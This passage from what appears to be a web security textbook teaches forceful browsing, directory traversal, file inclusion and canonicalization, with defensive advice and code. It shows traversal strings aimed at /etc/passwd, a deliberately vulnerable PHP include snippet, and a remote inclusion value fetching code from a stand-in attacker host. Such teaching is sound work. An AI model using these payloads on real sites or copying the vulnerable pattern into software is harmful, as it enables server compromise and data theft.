<a href="suggestion.php">Make an editing suggestion</a>
<a href="problem.php">Report a problem with this site</a>
</body>
</html>
[/sourcecode]
Question: Which page is Miss Black Cat most likely to visit next in her search for vulnerabilities?
a. photos.php
b. vote.php
c. suggestion.php
d. problem.php
Answer: None of the above! (Yes, I know this was an unfair trick question.) Miss Black Cat is a very savvy attacker, and she knows that her choices are never limited to just what the site developers meant for her. Instead of following one of these links to get to her next page, it's likely that she would try typing one of the following addresses into her browser just to see if any of them really exist:
• www.photos.cxx/admin.php
• www.photos.cxx/admin.html
• www.photos.cxx/private_photos.php
• www.photos.cxx/personal_photos.php
This is a very similar kind of attack to the file extension guessing attack we talked about in the previous section; in fact, both of these attacks are types of a larger category of web application attacks referred to as forceful browsing.
LINGO
Forceful browsing is a type of attack in which the attacker tries to gain information about the system by searching for unlinked pages or other resources. Sometimes these searches are simple, blind guesses for common names, and sometimes the attacker is tipped off to the existence of an unlinked file through a comment or reference in one of the other files in the application.
Subtypes of forceful browsing include filename and file extension guessing (as we've already seen), directory enumeration, insecure direct object referencing, and redirect workflow manipulation. You'll also hear forceful browsing sometimes referred to as "predictable resource location."
Forceful Browsing and Insecure Direct Object References
Forceful browsing attacks aren't always completely "blind," as in the examples we just showed where the attacker guessed at a page called admin.php. Sometimes an attacker has good reason to suspect that an unreferenced file exists on the server, just waiting to be uncovered.
If an attacker sees that a page has a reference to a resource like www.photos.cxx/images/00042.jpg or www.photos.cxx/stats/05152011.xlsx, then he's likely to try browsing for files with names close to those. The file "00042.jpg" looks as if it might be named based on an incrementing integer, so he might try "00041.jpg" or "00043.jpg." Likewise, "05152011.xlsx" looks as if it might be named based on a date (May 15, 2011), so he might try forcefully browsing for other files with names like "05162011.xlsx." Filenames like these are dead giveaways that there are other similar files in the same folder.
This attack is essentially the same insecure direct object reference attack that we covered in Chapter 7, except in this case it's an attack against the file system and not an attack against a database index. The solution to the problem is also essentially the same: Ensure that you're applying proper access authorization on a resource-by-resource basis. If all of the files in a particular directory are meant to be publicly accessible even though they're not necessarily linked into the rest of the application, then you're fine as-is. If some of those files need to remain private, then move them into a separate directory and require appropriate authentication and authorization to get to them.
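As a rough illustration of resource-by-resource authorization, here's a small Python sketch. The access table, the filenames in it, and the function name are all hypothetical. The idea is simply that every file request is checked against an explicit rule, and anything without a rule is refused, no matter how easy its name is to guess.

```python
from typing import Optional

# Hypothetical access table: filename -> set of users allowed to read it.
# A value of None marks a file that is intentionally public.
FILE_ACL = {
    "00042.jpg": None,
    "00043.jpg": {"dave"},
}


def may_read(filename: str, user: Optional[str]) -> bool:
    """Decide whether `user` (None for anonymous) may read `filename`."""
    if filename not in FILE_ACL:
        # No rule for this file: deny by default rather than guess.
        return False
    allowed_users = FILE_ACL[filename]
    if allowed_users is None:
        return True
    return user is not None and user in allowed_users
```

With a check like this in front of the files, guessing "00043.jpg" from "00042.jpg" gets an anonymous visitor nowhere, because the decision depends on who is asking and not on whether the name was linked anywhere.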
Directory Enumeration
If Cat's guesses at filenames turn up nothing, then she may move on to try some guesses at common directory names:
• www.photos.cxx/admin/
• www.photos.cxx/test/
• www.photos.cxx/logs/
• www.photos.cxx/includes/
• www.photos.cxx/scripts/
Also, the insecure direct object reference attack can be a very effective way to find hidden directories. If there's a "jan" folder and a "feb" folder, there are probably "mar" and "apr" folders too. And again, this is not necessarily a bad thing. In fact, some Model-View-Controller (MVC) application architectures intentionally work this way, so that a user can search for a particular range of data by manually changing a date string in a URL (for example, "201104" to "201105"). But whether to expose this data or not should be up to you, not to an attacker.
If any of the different common directory names or date/integer object reference manipulations that Cat tries comes back with anything besides an HTTP 404 "Not Found" error, she's in business. She'll be happy if she just gets redirected to a real page; for example, if her request for www.photos.cxx/test/ redirects her to the default page www.photos.cxx/test/default.php. This means that she's found an area of the web site she wasn't supposed to be in and whose only defense was probably the fact that nobody outside the organization was supposed to know that it existed. This page and this directory are unlikely to have strong authentication or authorization mechanisms, and probably won't have proper input validation on the controls either. Why would developers bother hardening code that only they use? (Or so they thought...)
While this would be good for Cat, what she really wants is for the server to return a directory listing of the requested folder. You can see in Figure 8-6 what a directory listing would look like.
Figure 8-6 A directory listing of a guessed folder
It's basically the same thing you'd see if you opened a folder in your OS on your local machine: It shows all the files and subdirectories present in that folder. If an attacker gets this, he won't have to keep making random blind guesses; he'll know exactly what's there. Always configure your web server to disable directory listings.
Status Code Deltas
We said just a minute ago that our attacker Cat was looking for any HTTP status code result from her probing attacks besides 404 "Not Found." To be a little more accurate, it's not so much that she'd be looking for a certain status code, but more that she'd be looking for a change or delta between status codes.
Into Action
To properly defend against directory enumeration attacks, it's important to set up your web server to disable directory listings, as we mentioned earlier. But also make sure that the error code that's returned is always the same error code. Whether it's 404 or 401 or 403 doesn't really matter. You could even return 200 OK with a message like "Page Not Found" in the page text. Just make sure it's the same message whether the directory actually exists or not.
The exact methods used to configure a web server to correctly serve custom error pages like this vary from server to server. For Apache, you can set the ErrorDocument directive in the httpd.conf configuration file like this:
[sourcecode]
<Directory /web/docs>
ErrorDocument 400 /error.html
ErrorDocument 401 /error.html
...
[/sourcecode]
Instead of redirecting to an error page, you can also configure Apache to just serve some simple text:
[sourcecode]
<Directory /web/docs>
ErrorDocument 400 "An error occurred."
. . .
[/sourcecode]
You can also configure Microsoft IIS through the httpErrors section in any of its configuration files (web.config, machine.config, and applicationhost.config):
[sourcecode]
<httpErrors>
<error statusCode="400" path="error.html" />
<error statusCode="401" path="error.html" />
...
[/sourcecode]
For a more detailed look at various configuration options for these web servers, read the Apache documentation on custom error responses (httpd.apache.org/docs/2.2/custom-error.html) or the article "How to Use HTTP Detailed Errors in IIS 7.0" found on the IIS.net site (http://learn.iis.net/page.aspx/267/how-to-use-http-detailed-errors-in-iis-70/).
For example, let's say she looked for a completely random folder that would be almost 100 percent guaranteed not to exist, something like www.photos.cxx/q2o77xz4/. If the server returns an HTTP 403 "Forbidden" response code, that doesn't necessarily mean that the folder exists and that she's stumbled upon a secret hidden directory. It could just mean that the server has been configured to always return 403 Forbidden for nonexistent directories.
On the other hand, if a request for www.photos.cxx/q2o77xz4/ turns up a 404 Not Found response but a request for www.photos.cxx/admin/ comes back with 403 Forbidden or 401 Unauthorized, then that's a good sign that the /admin directory does actually exist. From Cat's perspective, this is nowhere near as useful as getting an actual directory listing, but it may help with some other attacks such as a directory traversal.
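One way to deny Cat that delta at the application level is to make "doesn't exist" and "exists, but not for you" produce exactly the same response. The Python sketch below assumes a hypothetical site map (PUBLIC_PATHS and PROTECTED_PATHS) and a made-up respond function; it isn't tied to any particular web framework.

```python
from http import HTTPStatus

# Hypothetical site map for illustration: public pages, plus protected
# folders mapped to the set of users allowed to see them.
PUBLIC_PATHS = {"/welcome.php", "/photos.php"}
PROTECTED_PATHS = {"/admin/": {"dave"}}


def respond(path, user=None):
    """Return (status, body); unknown and forbidden paths look identical."""
    if path in PUBLIC_PATHS:
        return HTTPStatus.OK, "public content"
    if user is not None and user in PROTECTED_PATHS.get(path, set()):
        return HTTPStatus.OK, "protected content"
    # Same status and same body whether the path is missing or merely
    # off-limits, so the response reveals nothing about what exists.
    return HTTPStatus.NOT_FOUND, "Page Not Found"
```

In this sketch an anonymous request for /admin/ is indistinguishable from a request for /q2o77xz4/. Whether the shared answer is 404 or some other code matters less than the fact that it is shared.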
Redirect Workflow Manipulation
The final form of forceful browsing we'll be talking about is less commonly seen than the others, but still very dangerous when you do see it. Sometimes developers write web applications with an implicit workflow in mind. They might assume that users will first visit their welcome page, then view some catalog item pages, maybe put some items in a shopping cart, and then check out and pay. Of course, without explicit checks in place, users can visit pages in any order they want. Here's an example of what might go wrong for an application developer when an attacker decides to manipulate an implicit workflow.
So many people have loved the photos in Dave's photo gallery application that he's decided to make it into a side business and sell prints. On the page www.photos.cxx/view_photo.php, he adds a new button "Buy a Print" that redirects users to www.photos.cxx/buy_print.php. Once they've chosen the size of print that they want, along with any matting or framing options, they get redirected again to www.photos.cxx/billing.php. Here, they give their credit card information so Dave can bill them for their new artwork. Finally, they get redirected to www.photos.cxx/shipping.php where they enter their shipping address. Figure 8-7 shows how this application workflow flows—or at least, how it flows for legitimate, honest users.
Figure 8-7 The legitimate www.photos.cxx print purchase workflow
Unfortunately, while Dave is a very good photographer, his web application security skills are not quite up to the same level of ability. In this case, Dave just assumed that users would follow his implicit workflow, moving from page A to page B to page C the way he intended them to. But he never added any code to ensure this. Miss Black Cat (being a photography lover herself) comes into Dave's gallery, picks a photo she likes on view_photo.php, chooses her print options on buy_print.php, but then skips completely over the billing.php page to go straight to shipping.php. (Cat may be keen on photography, but she was never very big on actually paying for things.) Figure 8-8 shows how Cat bypasses the intended workflow by forcefully browsing her way through the application.
Figure 8-8 An attacker exploits a forceful browsing vulnerability in the www.photos.cxx print purchase workflow.
Your Plan
❏ Always assume that any file or subdirectory you put in a publicly accessible web folder will be found by an attacker. If you want to make sure that only certain people have the right to access those resources, you need to ensure that through proper authorization. Just giving the resources unusual or hard-to-guess names as their only defense is relying on security through obscurity, and you're likely to regret that later.
❏ Configure your web server to disable directory listings.
❏ Return the same HTTP error code when a user makes a request for a page that he's not authorized to view as you do when he makes a request for a page that really doesn't exist. If an attacker sees that his request for www.site.cxx/admin returns a 401 Unauthorized response and his request for a randomly named page like www.site.cxx/qw32on87 returns a 404 Not Found response, then that's a pretty good clue that the /admin resource does exist and is worth further probing.
❏ Remember that unless you add server-side checks, users can visit any page in your application they want to in any order. If you have an implicit workflow to your application, implement server-side state checking on each step of the workflow. This goes for asynchronous RIA calls as well as traditional redirects.
Again, you won't often see forceful browsing vulnerabilities like this in traditional thin-client "Web 1.0" applications, but they are a little more common in RIAs. Ajax and Flex client-side modules sometimes make series of asynchronous calls back to their server-side components. If the application is implicitly relying on these calls happening in a certain order (that is, the "choosePrint" call should be made before the "enterBillingInfo" call, which should be made before the "enterShippingInfo" call), then the exact same type of vulnerability can occur.
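Here's a minimal sketch of what server-side state checking for Dave's print purchase workflow might look like. It's written in Python for illustration, with a plain dictionary standing in for the server-side session; the function names and the "steps_done" key are assumptions, not part of any real framework.

```python
# The intended order of the purchase workflow.
WORKFLOW = ("buy_print.php", "billing.php", "shipping.php")


def page_to_serve(session: dict, requested: str) -> str:
    """Return the requested page only if every earlier step is complete;
    otherwise return the first step the user still has to finish."""
    if requested not in WORKFLOW:
        raise ValueError("not a workflow page: " + requested)
    done = session.get("steps_done", 0)
    if WORKFLOW.index(requested) <= done:
        return requested
    return WORKFLOW[done]


def mark_step_done(session: dict, page: str) -> None:
    """Record a finished step. Call this only after the server has
    validated the data submitted for that step, and only in order."""
    done = session.get("steps_done", 0)
    if done < len(WORKFLOW) and WORKFLOW[done] == page:
        session["steps_done"] = done + 1
```

If Cat requests shipping.php before completing billing.php, page_to_serve sends her back to billing.php. The same check applies whether the request arrives as a page navigation or as an asynchronous call from a client-side module, as long as the state lives on the server.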
Directory Traversal
Virtually every web application attack works on a premise of "tricking" the web application into performing an action that the attacker is unable to directly perform himself. An attacker can't normally directly access an application's database, but he can trick the web application into doing it for him through SQL injection attacks. He can't normally access other users' accounts, but he can trick the web application into doing it for him through cross-site scripting attacks. And he can't normally access the file system on a web application server, but he can trick the application into doing it for him through directory traversal attacks. To show an example of directory traversal, let's return one more time to Dave's photo gallery site.
The main page for www.photos.cxx where users go to see Dave's pictures is the page view_photo.php. The particular picture that gets displayed to the user is passed in the URL parameter "picfile," like this: www.photos.cxx/view_photo.php?picfile=mt_rainier.jpg. Normally a user wouldn't type this address in himself—he would just follow a link from the main gallery page that looks like this:
[sourcecode]
<html>
<body>
...
<a href="view_photo.php?picfile=mt_rainier.jpg">Mount Rainier sunset</a>
<a href="view_photo.php?picfile=space_needle.jpg">Space Needle</a>
<a href="view_photo.php?picfile=troll.jpg">Fremont Bridge Troll</a>
</body>
</html>
[/sourcecode]
An attacker may be able to manually change the picfile parameter to manipulate the web application into opening and displaying files outside its normal image file directory, like this: http://www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg. This is called a directory traversal or path traversal attack. In this case, the attacker is attempting to break out of the internal folder where Dave keeps his photos and into a guessed "private" folder. The "../" prefix is a file system directive to "go up" one folder, so the folder "images/public/../private" is really the same folder as "images/private." This is why you'll occasionally hear directory traversal attacks called "dot-dot-slash" attacks.
Directory traversal attacks are similar to forceful browsing in that the attacker is attempting to break out of the intended scope of the application and access files he's not supposed to be able to. In fact, some web application security experts consider directory traversal to be another subcategory of forceful browsing attacks like filename guessing or directory enumeration.
IMHO
If you want to think of directory traversal attacks this way, I think that's fine, but personally I think there's a big enough distinction between them: forceful browsing issues are generally web server issues that can be mitigated through appropriate web server configuration, while directory traversal attacks are generally web application issues that need to be fixed through application code changes.
Applications may also be vulnerable to directory traversal through attacks that encode the directory escape directive. Instead of trying the attack string "../private/cancun.jpg," an attacker might try the URL-encoded variation "%2E%2E%2Fprivate%2Fcancun%2Ejpg." This is a type of canonicalization attack (trying an alternative but equivalent name for the targeted resource), and we'll cover these attacks in more detail later in this chapter.
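A few lines of Python show why the encoded string is just as dangerous as the plain one. The snippet uses the standard library's urllib.parse.unquote to decode the attack string from the paragraph above; the variable names are ours.

```python
from urllib.parse import unquote

encoded = "%2E%2E%2Fprivate%2Fcancun%2Ejpg"

# A naive filter that only looks for the literal "../" misses the encoded form.
naive_filter_blocks_it = "../" in encoded

# Once the value is percent-decoded, the escape sequence is back.
decoded = unquote(encoded)

print(naive_filter_blocks_it)  # False
print(decoded)                 # ../private/cancun.jpg
```

Any check for "../" therefore has to run on the decoded value, after every layer of decoding the application or server will apply.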
/etc/passwd
The classic example of a directory traversal attack is an attempt to read the /etc/passwd user information file. The /etc/passwd file is found on some Unix-based operating systems and contains a list of all users on the system, along with their names, e-mail addresses, phone numbers, and physical locations: a gold mine of data for a potential attacker.
Note
Even though its name implies otherwise, in modern systems /etc/passwd does not actually contain a list of users' passwords. Early versions of Unix did work this way, but now passwords are kept in a separate, more secure file only accessible by the system root user.
One especially nice thing about /etc/passwd (from an attacker's perspective) is not just that it has a lot of really interesting and potentially valuable data; it's that there's no guessing involved as to where the file is located on the server. It's always the file "passwd" located in the directory "etc." Retrieving this file (or any other standard system file always located in the same place) is a lot simpler than trying to blindly guess at files or directories that may not actually exist. The only question is, how far back in the directory structure is it? It may be 1 folder back: http://www.photos.cxx/view_photo.php?picfile=../etc/passwd; or it may be 2 folders back: http://www.photos.cxx/view_photo.php?picfile=../../etc/passwd; or it may be 20 folders back. But even if it is 20 folders back, that's still a lot fewer guesses than an attacker would need to find something like www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg.
More Directory Traversal Vulnerabilities
Even though it's bad enough that attackers can exploit directory traversal vulnerabilities to read other users' confidential data and sensitive system files, there are other possibilities that may be even worse. Imagine what might happen if your web application opened a user-specified file in read-write mode instead of just read-only mode; for example, if you allowed the user to specify the location of a log file or user profile file. An attacker could then overwrite system files, either to crash the system entirely (causing a denial-of-service attack) or in a more subtle attack, to inject his own data. If he could make changes to /etc/passwd, he might be able to add himself as a full-fledged system user. If he could determine the location of the application's database (for instance, if the database connection string were accidentally leaked in a code comment as discussed earlier), then he could make changes to the database directly without having to mess around with complex SQL injection attacks. The possibilities are almost endless.
This attack isn't as farfetched as it might seem, especially if you consider that a web application might easily look for a user profile filename in a cookie and not necessarily in the URL query string.
Tip
Always remember that every part of an HTTP request, including the URL query string, the request body text, headers, and cookies, can be changed by an attacker with an HTTP proxy tool.
File Inclusion Attacks
One exceptionally nasty variant of directory traversal is the file inclusion attack. In this attack, the attacker is able to specify a file to be included as part of the target page's server-side code. This vulnerability is most often seen in PHP code that uses the "include" or "require" functions, but it's possible to have the same issue in many different languages and frameworks. Here's an example of some vulnerable code.
Dave is having great success with the new print purchase feature of his photo gallery application (with the exception of a few security breaches that he's trying to take care of). In order to better serve his customers who are visiting his site with iPhones and Androids, he adds a drop-down list to the main page that lets the user choose between the full-fledged regular high-bandwidth user interface and a simpler reduced-bandwidth interface:
[sourcecode]
<html>
<body>
...
<form method="get">
<select name="layout">
<option value="standard.php">Standard layout</option>
<option value="simple.php">Simple layout</option>
</select>
<input type="submit" />
</form>
</body>
</html>
[/sourcecode]
In the PHP code, Dave gets the incoming value of the "layout" parameter and then loads that file into the page in order to execute that code and change the page's layout behavior:
[sourcecode]
<?php
$layout = $_GET['layout'];
include($layout);
[/sourcecode]
Of course this code is vulnerable to the same directory traversal attacks we've already discussed; an attacker could make a request for this page with the "layout" parameter set to ../../etc/passwd or any other system file. But there's a much more serious possibility too. Instead of loading in system files, an attacker could specify his own PHP code from his own server by setting the layout parameter to http://evilsite.cxx/exploit.php. The server would then fetch this code and execute it. If this happens, the attacker would have complete control over the web server just as if he were one of the legitimate developers of the web site.
Into Action
It's best to avoid including source code files based on user-specified filenames. If you must, try hard-coding a specific list of possibilities and letting users select by index rather than name, just as we did to avoid the insecure direct object reference vulnerabilities we discussed in Chapter 7. So in this case, Dave would have been better off setting his option values to "0" and "1" (or something like that) and then writing PHP to load either "standard.php" when layout is equal to 0 or "simple.php" when layout is equal to 1.
If that's not an option for you, you'll need to canonicalize the filename value and test it before loading that resource. (We'll talk about how to do this next.) Also, if you're using PHP, you should set the allow_url_fopen configuration setting to "Off," which prohibits the application from loading external resources with the include or require functions. The related allow_url_include setting, which governs URL includes specifically and has been off by default since PHP 5.2, should stay off as well.
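Returning to the first suggestion, selecting by index rather than by name, the logic might look something like the following. It's sketched in Python rather than PHP just to show the shape of the check; the LAYOUTS tuple and the layout_file function are hypothetical names, and falling back to the standard layout on bad input is one possible design choice among several (rejecting the request outright is another).

```python
# The only files that may ever be included, in a fixed order.
LAYOUTS = ("standard.php", "simple.php")


def layout_file(layout_param: str) -> str:
    """Map the user-supplied 'layout' value to a hard-coded filename.

    The user's input is only ever used as an index into LAYOUTS; it is
    never used as a filename itself.
    """
    try:
        index = int(layout_param)
    except (TypeError, ValueError):
        index = 0  # anything that isn't a number falls back to the default
    if not 0 <= index < len(LAYOUTS):
        index = 0  # out-of-range numbers fall back too
    return LAYOUTS[index]
```

Whatever an attacker sends, whether "../../etc/passwd" or a URL on his own server, the function can only ever return one of the two filenames the developer listed.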
Canonicalization
You like potato, and I like potahto
You like tomato, and I like tomahto
Potato, potahto, tomato, tomahto
Let's call the whole thing off.
—Louis Armstrong
Human beings often have many different ways of referring to the exact same object. What I call an "elevator," my British friend Mark might call a "lift." What a botanist calls a "Narcissus papyraceus" I call a "daffodil," and my wife Amy (having been raised in the South) calls a "jonquil." (Our cat calls them delicious, as he does with all our other house plants.)
Web servers also often have many different ways of referring to the exact same file. To Dave's photo gallery application, the page "http://www.photos.cxx/my favorite pictures.html" is the same page as "http://www.photos.cxx/MY FAVORITE PICTURES.html" and the same page as "http://www.photos.cxx/My%20Favorite%20Pictures.html" too. It might also be "http://192.168.126.1/my favorite pictures.html," "./my favorite pictures.html," or "c:\inetpub\wwwroot\photos\myfavo~1.htm." If we were to list out all the possible combination variations of encodings, domain addresses, relative/absolute paths, and capitalization, there would probably be tens if not hundreds of thousands of different ways to refer to this one single file. Figure 8-9 shows an example of just a few of these possibilities, all pointing to the same file on the server.
Figure 8-9 Different filenames all resolving to the same file on the web server
What this means for us in terms of directory traversal attacks is that it's pretty much impossible to prevent them by testing for specific banned files or directories (also called blacklist testing). If you check to make sure the user isn't trying to load "/etc/passwd", that still means he can load "/ETC/PASSWD" or "/folder/../etc/passwd" or "/etc/passwd%00" or many other variations that end up at the exact same file. Even checking to see whether the filename starts with "../" won't work, because the attacker can simply specify an absolute filename instead of a relative one.
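The weakness of blacklist testing on raw strings is easy to demonstrate. In the Python sketch below, BANNED and both function names are made up for illustration; posixpath.normpath is a standard library function that collapses "..", ".", and doubled slashes in Unix-style paths.

```python
import posixpath

BANNED = {"/etc/passwd"}


def naive_is_allowed(path: str) -> bool:
    """Blacklist check on the raw string: easy to write, easy to bypass."""
    return path not in BANNED


def normalized_is_allowed(path: str) -> bool:
    """The same blacklist, applied after collapsing '..', '.', and '//'."""
    return posixpath.normpath(path) not in BANNED


# Different spellings that all name the same file.
variants = ["/folder/../etc/passwd", "/etc/./passwd", "/etc//passwd"]
```

Every entry in variants slips past naive_is_allowed, while normalized_is_allowed catches all three. Even so, normalizing the path handles only one kind of variation (not capitalization, encoding, or symbolic links), which is why a banned list remains a fragile defense however it's applied.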
The solution to the problem is to canonicalize the input value (that is, reduce it to a standard value) before testing it. The canonical representation of "http://www.photos.cxx/My Favorite Pictures.html" and "http://192.168.126.1/my%20favorite%20pictures.html" and all other possible variants of encodings and capitalizations and domain addresses might resolve to one single standard value of "http://www.photos.cxx/my favorite pictures.html." Only once a value has been properly canonicalized can you test it for correctness.
Tip
Canonicalization is tricky, so don't try to come up with your own procedure for it. Use the built-in canonicalization functions provided by your application language and framework.
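As one example of leaning on built-in functions, here's a sketch of a canonicalize-then-test check in Python. It relies on os.path.realpath and os.path.commonpath from the standard library; the function names resolve_inside and is_inside, and the idea of a single allowed base directory, are assumptions made for this illustration. It also assumes the value has already been URL-decoded, as most web frameworks do before handing parameters to application code.

```python
import os


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Canonicalize user_path relative to base_dir and return the result,
    refusing anything that ends up outside base_dir."""
    if "\x00" in user_path:
        raise PermissionError("null byte in path")
    base = os.path.realpath(base_dir)
    # realpath resolves "..", ".", duplicate slashes, and symbolic links.
    # If user_path is absolute, join() discards base, and the check below
    # then rejects it unless it really does point inside base.
    candidate = os.path.realpath(os.path.join(base, user_path))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # for example, paths on different Windows drives
        inside = False
    if not inside:
        raise PermissionError("path escapes the allowed directory")
    return candidate


def is_inside(base_dir: str, user_path: str) -> bool:
    """Convenience wrapper: True if user_path stays within base_dir."""
    try:
        resolve_inside(base_dir, user_path)
        return True
    except PermissionError:
        return False
```

The test here is a positive one (is the canonical path inside the one folder we mean to serve?) rather than a list of banned names, so "../private/cancun.jpg" and "/etc/passwd" are refused for the same reason: neither resolves to a location under the base directory.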
We've Covered
Keeping your source code secret
• The difference between static and dynamic web content
• The difference between interpreted and compiled source code
• Backup file leakage and include file leakage
• Keeping secrets out of publicly visible comments
• Keeping sensitive functionality on the server tier
Security through obscurity
• Obscuring information or functionality can enhance security
• Never rely on obscurity alone
Forceful browsing
• Guessed files and folders
• Insecure direct object references
• Directory enumeration
• HTTP status code information leakage
Directory traversal
• Reading sensitive data: /etc/passwd
• Writing to unauthorized files
• PHP file inclusion
• Canonicalization
Figure 8-1 An attacker can statically analyze desktop applications, but web applications are like black boxes.
Figure 8-2 The photos.cxx server is configured to process PHP pages as dynamic content.
Figure 8-3 The photos.cxx server is misconfigured to serve PHP files as static content, revealing the application's source code.
Figure 8-4 The Java Decompiler tool reconstructs Java source code from a compiled JAR file.
Figure 8-5 Google Maps uses client-side JavaScript extensively in order to provide a responsive user interface.